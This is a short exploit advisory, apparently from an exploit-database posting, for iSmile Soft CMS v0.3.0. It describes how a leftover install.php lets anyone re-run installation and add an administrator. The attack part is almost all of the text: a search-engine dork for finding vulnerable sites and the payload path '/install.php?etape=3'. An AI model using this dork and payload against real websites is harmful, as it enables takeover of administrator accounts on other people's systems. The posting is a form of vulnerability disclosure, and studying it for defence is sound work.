<pre><code>====================================================================================================================================<br />| # Title : iSmile Soft CMS v0.3.0 Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.helpernt.com/ |<br />| # Dork : JamalCom هذا السكربت مبرمج بواسطة |<br />====================================================================================================================================<br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] The installation file allows the script to be re-installed and a new administrator to be added. The cause lies with the designer: <br /> the designer does not recommend deleting the installation folder, and the user does not pay attention to deleting the installation file.<br /><br />[+] use payload : /install.php?etape=3<br /><br />[+] http://127.0.0.1/iSmile/install.php?etape=3<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>